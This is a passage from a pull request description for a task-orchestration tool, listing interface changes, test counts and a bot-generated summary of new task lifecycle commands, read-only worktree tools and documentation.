- **UX A**: user-facing vocabulary unified to Task/Worker (en/ko/pl), Missions section keeps a one-line empty state and groups tasks under their parent, fan-out dialog confirms an all-empty launch, merges readiness toasts and widens the role select, Settings notes that `claude-pty` switches the panel to a terminal.

## Tests

14 gate runner, 7 adopt service, 80 worktask RPC, 29 MCP tool-surface, 5 mission grouping, 7 fan-out dialog. Full `npm test`: 14,345 passing, 0 failing. `npm run lint` errors are pre-existing on main (none introduced).

## Notes

- Changelog fragment: `changelog.d/orch-o2.md`.
- Follow-up outside this lane: `Sidebar.tsx` still carries a comment saying the Missions section renders null when empty.

<!-- This is an auto-generated comment: release notes by coderabbit.ai -->

## Summary by CodeRabbit

* **New Features**
  * Added task lifecycle commands for running checks, adopting changes, closing tasks, and opening pull requests.
  * Added read-only task worktree tools for Git status, history, and pull request details.
  * Added safeguards and structured refusal reporting for task operations.
* **User Interface**
  * Improved task sidebar grouping, empty states, and completed-task summaries.
  * Added confirmation for launching tasks without prompts and consolidated readiness notifications.
  * Clarified the embedded terminal behavior of the `claude-pty` runtime.
* **Documentation**
  * Documented the task orchestration tool contract and workflows.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->